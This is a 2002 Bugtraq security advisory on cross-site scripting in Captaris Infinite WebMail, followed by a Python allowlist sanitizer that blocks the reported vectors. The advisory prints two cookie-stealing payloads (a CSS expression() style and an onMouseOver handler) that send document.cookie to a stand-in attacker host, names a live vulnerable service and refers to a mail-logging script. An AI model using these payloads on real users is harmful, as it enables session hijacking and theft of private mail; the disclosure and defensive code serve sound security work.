[28222] in bugtraq


Captaris (Infinite) WebMail XSS

daemon@ATHENA.MIT.EDU (Pedram Amini)
Mon Dec 16 18:53:52 2002

From: "Pedram Amini" <pedram@redhive.com>
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
Date: Mon, 16 Dec 2002 18:23:10 -0500
Message-ID: <000001c2a55a$19a727e0$6400000a@idlap1605>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

I figured it was about time I hopped on the XSS band-wagon.

The Captaris (www.captaris.com) Infinite WebMail application is vulnerable to
Cross-Site Scripting (XSS) attacks. The application fails to filter the
following constructs, either of which can be used to redirect a user to an
attacker's script:

Launch on e-mail open:
    <p style="left:expression(document.location=
    'http://attackers.server/cgi-bin/logger.cgi?'
    +document.cookie)">

Launch on mouse over:
    <b onMouseOver="document.location=
    'http://attackers.server/cgi-bin/logger.cgi?'
    +document.cookie">

I am sure there are other XSS attack methods that can also be utilized to
bypass their basic filtering.

A sample vulnerable service is provided by dog.com (www.dogmail.com), which is
running WebMail v3.61.05. A sample cookie and mail logger script that retrieves
all of the messages in the user's main mailbox is attached, and can also be
found at
http://pedram.redhive.com/advisories/dogmail.cgi

-pedram
http://pedram.redhive.com
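The two payloads above are worth a closer look because neither contains a <script> tag: the first rides on Internet Explorer's proprietary CSS expression() dynamic property, the second on an ordinary event-handler attribute, so a filter that only strips <script> blocks passes both untouched. The following is an added example, not code from the advisory or from Captaris, showing a tag-stripping filter of the "basic" kind the advisory describes next to an allowlist sanitizer that drops every attribute not explicitly permitted. The sanitizer, the naive_filter function and the allowlist tables are assumptions for illustration; the payload strings are constructed from the two vectors quoted above.

```python
import html
import re
from html.parser import HTMLParser

# Constructed from the two vectors in the advisory above (sample input).
PAYLOAD_EXPRESSION = (
    '<p style="left:expression(document.location='
    "'http://attackers.server/cgi-bin/logger.cgi?'"
    '+document.cookie)">body text</p>'
)
PAYLOAD_ONMOUSEOVER = (
    '<b onMouseOver="document.location='
    "'http://attackers.server/cgi-bin/logger.cgi?'"
    '+document.cookie">hover me</b>'
)


def naive_filter(markup):
    """Hypothetical 'basic filtering': remove <script>...</script> and nothing else.
    This is the kind of filter the advisory's payloads walk straight through."""
    return re.sub(r"(?is)<script\b.*?</script\s*>", "", markup)


# Allowlist used by the hardened sanitizer (assumed policy for a webmail body).
ALLOWED_TAGS = {"p", "b", "i", "u", "br", "a", "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}          # every other attribute is dropped,
SAFE_URL_SCHEMES = ("http:", "https:", "mailto:")  # including style and on*


def _safe_url(value):
    """Reject javascript:/data:/vbscript: style URLs; keep absolute http(s),
    mailto and colon-free relative paths."""
    v = "".join(ch for ch in (value or "").lower() if not ch.isspace() and ch.isprintable())
    return v.startswith(SAFE_URL_SCHEMES) or ":" not in v


class AllowlistSanitizer(HTMLParser):
    """Re-serialises markup keeping only allowlisted tags and attributes.
    Text nodes are re-escaped, so decoded entities cannot re-open a tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # (tag, attribute-or-None) pairs removed, for logging

    def _emit_tag(self, tag, attrs, self_closing):
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, name))     # style, onmouseover, ... land here
                continue
            if name == "href" and not _safe_url(value):
                self.dropped.append((tag, name))
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}{' /' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs):
        self._emit_tag(tag, attrs, self_closing=False)

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, attrs, self_closing=True)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    # Comments, doctypes and processing instructions carry nothing a mail body needs.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass


def sanitize(markup):
    """Return the allowlisted rendering of an untrusted HTML mail body."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for payload in (PAYLOAD_EXPRESSION, PAYLOAD_ONMOUSEOVER):
        print("naive filter :", naive_filter(payload))
        print("allowlist    :", sanitize(payload))
```

Run as a script it prints each payload unchanged after the naive filter and reduced to a bare <p> or <b> after the allowlist pass. The design point is that the allowlist never has to know about expression(), on* handlers or whatever bypass turns up next: anything not named in ALLOWED_ATTRS is gone, and the only attribute that survives, href, is checked against a scheme allowlist rather than a denylist.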

